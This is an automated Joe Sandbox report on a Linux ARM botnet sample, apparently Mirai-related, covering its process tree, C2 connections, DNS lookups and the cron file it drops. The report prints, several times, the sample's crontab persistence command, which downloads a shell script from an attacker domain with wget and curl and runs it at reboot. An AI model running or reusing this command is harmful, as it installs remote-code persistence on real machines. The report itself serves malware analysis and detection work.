Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkarm5.elf

Overview

General Information

Sample name:nshkarm5.elf
Analysis ID:1576892
MD5:e1226c8cfe75cc7aa640009a993d79a3
SHA1:c5af7d771744f1913fdaba158777af403ee47135
SHA256:19c0973424e78afb5488857a732d0743accf0c1e5a5670420d0032635fcc67ec
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1576892
Start date and time:2024-12-17 17:42:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkarm5.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@10/0
  • VT rate limit hit for: nshkarm5.elf
Command:/tmp/nshkarm5.elf
PID:5430
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshkarm5.elf (PID: 5430, Parent: 5351, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nshkarm5.elf
    • sh (PID: 5432, Parent: 5430, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5434, Parent: 5432)
        • sh New Fork (PID: 5436, Parent: 5434)
        • crontab (PID: 5436, Parent: 5434, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5435, Parent: 5432)
      • crontab (PID: 5435, Parent: 5432, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkarm5.elfReversingLabs: Detection: 21%
Source: tmp.yXIL8b.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 80.78.26.121 ports 13275,1,2,3,5,7
Source: global trafficTCP traffic: 212.64.215.71 ports 21560,1,2,3,8,13238
Source: global trafficTCP traffic: 192.168.2.13:55384 -> 80.78.26.121:13275
Source: global trafficTCP traffic: 192.168.2.13:55978 -> 212.64.215.71:13238
Source: /tmp/nshkarm5.elf (PID: 5430)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.yXIL8b.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@10/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5436)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5435)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 5435)File: /var/spool/cron/crontabs/tmp.yXIL8bJump to behavior
Source: /usr/bin/crontab (PID: 5435)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkarm5.elf (PID: 5432)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshkarm5.elf (PID: 5430)Queries kernel information via 'uname': Jump to behavior
Source: nshkarm5.elf, 5430.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmp, nshkarm5.elf, 5437.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmp, nshkarm5.elf, 5481.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmpBinary or memory string: kkx86_64/usr/bin/qemu-arm/tmp/nshkarm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkarm5.elf
Source: nshkarm5.elf, 5430.1.0000559a43bc5000.0000559a43d19000.rw-.sdmp, nshkarm5.elf, 5437.1.0000559a43bc5000.0000559a43d19000.rw-.sdmp, nshkarm5.elf, 5481.1.0000559a43bc5000.0000559a43d19000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: nshkarm5.elf, 5430.1.0000559a43bc5000.0000559a43d19000.rw-.sdmp, nshkarm5.elf, 5437.1.0000559a43bc5000.0000559a43d19000.rw-.sdmp, nshkarm5.elf, 5481.1.0000559a43bc5000.0000559a43d19000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nshkarm5.elf, 5430.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmp, nshkarm5.elf, 5437.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmp, nshkarm5.elf, 5481.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nshkarm5.elf, 5481.1.00007ffd040a2000.00007ffd040c3000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576892 Sample: nshkarm5.elf Startdate: 17/12/2024 Architecture: LINUX Score: 60 30 212.64.215.71, 13238, 21560, 51460 RACKSPACE-LONGB Turkey 2->30 32 kingstonwikkerink.dyn 80.78.26.121, 13275, 55384 CYBERDYNELR Cyprus 2->32 34 daisy.ubuntu.com 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nshkarm5.elf 2->9         started        signatures3 process4 process5 11 nshkarm5.elf sh 9->11         started        13 nshkarm5.elf 9->13         started        15 nshkarm5.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nshkarm5.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.yXIL8b, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nshkarm5.elf21%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    kingstonwikkerink.dyn
    80.78.26.121
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;tmp.yXIL8b.18.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        80.78.26.121
        kingstonwikkerink.dynCyprus
        37560CYBERDYNELRfalse
        212.64.215.71
        unknownTurkey
        15395RACKSPACE-LONGBtrue
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        80.78.26.121nshkarm.elfGet hashmaliciousUnknownBrowse
          212.64.215.71nshkarm.elfGet hashmaliciousUnknownBrowse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            daisy.ubuntu.comla.bot.arm.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.24
            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.24
            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            .i.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 162.213.35.24
            hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 162.213.35.24
            kingstonwikkerink.dynnshkarm.elfGet hashmaliciousUnknownBrowse
            • 80.78.26.121
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            RACKSPACE-LONGBnshkarm.elfGet hashmaliciousUnknownBrowse
            • 212.64.215.71
            i686.elfGet hashmaliciousMiraiBrowse
            • 92.52.99.131
            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
            • 89.234.28.7
            Josho.arm.elfGet hashmaliciousUnknownBrowse
            • 89.234.45.46
            https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
            • 134.213.193.62
            meerkat.mips.elfGet hashmaliciousMiraiBrowse
            • 134.213.250.148
            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
            • 162.13.153.221
            teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
            • 92.52.99.126
            sora.mpsl.elfGet hashmaliciousMiraiBrowse
            • 89.234.45.54
            m68k.elfGet hashmaliciousMiraiBrowse
            • 5.79.3.85
            CYBERDYNELRnshkarm.elfGet hashmaliciousUnknownBrowse
            • 80.78.26.121
            GjNVpV53SR.exeGet hashmaliciousQuasarBrowse
            • 80.78.28.83
            p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 185.193.127.129
            PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
            • 80.78.24.30
            FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
            • 80.78.24.30
            PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
            • 80.78.24.30
            na.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 185.193.127.129
            na.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 185.193.127.129
            na.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 185.193.127.129
            na.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 185.193.127.129
            No context
            No context
            Process:/usr/bin/crontab
            File Type:ASCII text
            Category:dropped
            Size (bytes):306
            Entropy (8bit):5.150546302936049
            Encrypted:false
            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvmf9qvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFB:8QjHig8SfgJeHLUHYC+GABjnOGAFkz
            MD5:2BCDAB286738F285C6FFAE4DCDF6DB82
            SHA1:B56F4789A25CFAE7E669B7E3F000CEFD338A9677
            SHA-256:F960D25817685DEBCA2443D644A329058DBFF03BB2D2886973AA777C62A47C5B
            SHA-512:C4D552B1F56709E0FA8F1A06224F7E384EFECD7FE0D31F9AED6055BE7A28997DBD676093C42DD9691C09BB6F7E5295FBC30847F520BD22A8862054E839C8BB7A
            Malicious:true
            Reputation:low
            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 10:42:51 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
            Entropy (8bit):6.121489829687862
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:nshkarm5.elf
            File size:72'736 bytes
            MD5:e1226c8cfe75cc7aa640009a993d79a3
            SHA1:c5af7d771744f1913fdaba158777af403ee47135
            SHA256:19c0973424e78afb5488857a732d0743accf0c1e5a5670420d0032635fcc67ec
            SHA512:386a7d59bbc76e70bd5ba26966b542cb6692530b0725d5198c5ac94aa02a594ca3556887dafce1fbc1e7c0bf5cc7075487ba19bc7101980acf9bc2535a20cdfe
            SSDEEP:768:NVIhlc2RV0F5VgRIdjaMrSJt/3ACxSM/rWsmCvJmKN5d7g1jCL2YM0IMi85PddPS:nIrtGfSJxACNVtg1e80fX5KA8Sbbyon
            TLSH:69634B85FC819A12C6D1227BFB6E428D772753A8D3EF7203DD256F21778682B0E67601
            File Content Preview:.ELF...a..........(.........4...........4. ...(..........................................................T..........Q.td..................................-...L."....?..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

            ELF header

            Class:ELF32
            Data:2's complement, little endian
            Version:1 (current)
            Machine:ARM
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:ARM - ABI
            ABI Version:0
            Entry Point Address:0x8190
            Flags:0x2
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:3
            Section Header Offset:72336
            Section Header Size:40
            Number of Section Headers:10
            Header String Table Index:9
            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x80940x940x180x00x6AX004
            .textPROGBITS0x80b00xb00xfc700x00x6AX0016
            .finiPROGBITS0x17d200xfd200x140x00x6AX004
            .rodataPROGBITS0x17d340xfd340x19840x00x2A004
            .ctorsPROGBITS0x216bc0x116bc0x80x00x3WA004
            .dtorsPROGBITS0x216c40x116c40x80x00x3WA004
            .dataPROGBITS0x216d00x116d00x3800x00x3WA004
            .bssNOBITS0x21a500x11a500x50fc0x00x3WA004
            .shstrtabSTRTAB0x00x11a500x3e0x00x0001
            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x80000x80000x116b80x116b86.15320x5R E0x8000.init .text .fini .rodata
            LOAD0x116bc0x216bc0x216bc0x3940x54902.83160x6RW 0x8000.ctors .dtors .data .bss
            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
            TimestampSource PortDest PortSource IPDest IP
            Dec 17, 2024 17:42:57.160559893 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:42:57.280103922 CET132755538480.78.26.121192.168.2.13
            Dec 17, 2024 17:42:57.280236006 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:42:57.280508995 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:42:57.400465012 CET132755538480.78.26.121192.168.2.13
            Dec 17, 2024 17:42:57.400584936 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:42:57.520565033 CET132755538480.78.26.121192.168.2.13
            Dec 17, 2024 17:43:01.599678040 CET132755538480.78.26.121192.168.2.13
            Dec 17, 2024 17:43:01.599971056 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:43:01.600305080 CET5538413275192.168.2.1380.78.26.121
            Dec 17, 2024 17:43:21.864144087 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:21.983927965 CET1323855978212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:21.984199047 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:21.984199047 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:22.105329990 CET1323855978212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:22.105664968 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:22.225882053 CET1323855978212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:23.451215029 CET1323855978212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:23.451580048 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:23.451580048 CET5597813238192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:33.700510025 CET5146021560192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:33.820112944 CET2156051460212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:33.820391893 CET5146021560192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:33.822243929 CET5146021560192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:33.941772938 CET2156051460212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:33.942142963 CET5146021560192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:34.061918974 CET2156051460212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:43.828296900 CET5146021560192.168.2.13212.64.215.71
            Dec 17, 2024 17:43:43.947887897 CET2156051460212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:44.330163002 CET2156051460212.64.215.71192.168.2.13
            Dec 17, 2024 17:43:44.330436945 CET5146021560192.168.2.13212.64.215.71
            TimestampSource PortDest PortSource IPDest IP
            Dec 17, 2024 17:42:51.914963007 CET4379153192.168.2.13139.84.165.176
            Dec 17, 2024 17:42:52.072906017 CET3355553192.168.2.13139.84.165.176
            Dec 17, 2024 17:42:56.921483040 CET5480853192.168.2.1381.169.136.222
            Dec 17, 2024 17:42:57.079123020 CET5376153192.168.2.1381.169.136.222
            Dec 17, 2024 17:42:57.159485102 CET535480881.169.136.222192.168.2.13
            Dec 17, 2024 17:42:57.317496061 CET535376181.169.136.222192.168.2.13
            Dec 17, 2024 17:42:57.318564892 CET3602653192.168.2.1370.34.254.19
            Dec 17, 2024 17:43:02.320959091 CET4799753192.168.2.13194.36.144.87
            Dec 17, 2024 17:43:02.571147919 CET5347997194.36.144.87192.168.2.13
            Dec 17, 2024 17:43:03.733416080 CET4302353192.168.2.131.1.1.1
            Dec 17, 2024 17:43:03.733474970 CET4133953192.168.2.131.1.1.1
            Dec 17, 2024 17:43:03.872579098 CET53413391.1.1.1192.168.2.13
            Dec 17, 2024 17:43:03.954772949 CET53430231.1.1.1192.168.2.13
            Dec 17, 2024 17:43:06.603210926 CET6085053192.168.2.13139.84.165.176
            Dec 17, 2024 17:43:11.607873917 CET4903153192.168.2.1364.176.6.48
            Dec 17, 2024 17:43:16.614177942 CET4819153192.168.2.135.161.109.23
            Dec 17, 2024 17:43:21.620517969 CET5040453192.168.2.13202.61.197.122
            Dec 17, 2024 17:43:21.863358021 CET5350404202.61.197.122192.168.2.13
            Dec 17, 2024 17:43:28.453824997 CET4085053192.168.2.13137.220.52.23
            Dec 17, 2024 17:43:33.460323095 CET4119853192.168.2.13217.160.70.42
            Dec 17, 2024 17:43:33.699110985 CET5341198217.160.70.42192.168.2.13
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 17, 2024 17:42:51.914963007 CET192.168.2.13139.84.165.1760x7421Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:42:56.921483040 CET192.168.2.1381.169.136.2220x83d6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:03.733416080 CET192.168.2.131.1.1.10x90b1Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:03.733474970 CET192.168.2.131.1.1.10x7efStandard query (0)daisy.ubuntu.com28IN (0x0001)false
            Dec 17, 2024 17:43:06.603210926 CET192.168.2.13139.84.165.1760x3effStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:11.607873917 CET192.168.2.1364.176.6.480x2d61Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:16.614177942 CET192.168.2.135.161.109.230x1af8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:21.620517969 CET192.168.2.13202.61.197.1220x8db0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:28.453824997 CET192.168.2.13137.220.52.230x254aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:33.460323095 CET192.168.2.13217.160.70.420xb8fcStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 17, 2024 17:42:57.159485102 CET81.169.136.222192.168.2.130x83d6No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
            Dec 17, 2024 17:42:57.159485102 CET81.169.136.222192.168.2.130x83d6No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
            Dec 17, 2024 17:42:57.317496061 CET81.169.136.222192.168.2.130x83d6Format error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:03.954772949 CET1.1.1.1192.168.2.130x90b1No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:03.954772949 CET1.1.1.1192.168.2.130x90b1No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:21.863358021 CET202.61.197.122192.168.2.130x8db0No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:21.863358021 CET202.61.197.122192.168.2.130x8db0No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:33.699110985 CET217.160.70.42192.168.2.130xb8fcNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
            Dec 17, 2024 17:43:33.699110985 CET217.160.70.42192.168.2.130xb8fcNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false

            System Behavior

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/tmp/nshkarm5.elf
            Arguments:/tmp/nshkarm5.elf
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/tmp/nshkarm5.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/bin/sh
            Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/usr/bin/crontab
            Arguments:crontab -l
            File size:43720 bytes
            MD5 hash:66e521d421ac9b407699061bf21806f5

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/bin/sh
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/usr/bin/crontab
            Arguments:crontab -
            File size:43720 bytes
            MD5 hash:66e521d421ac9b407699061bf21806f5

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/tmp/nshkarm5.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/tmp/nshkarm5.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):16:42:51
            Start date (UTC):17/12/2024
            Path:/tmp/nshkarm5.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1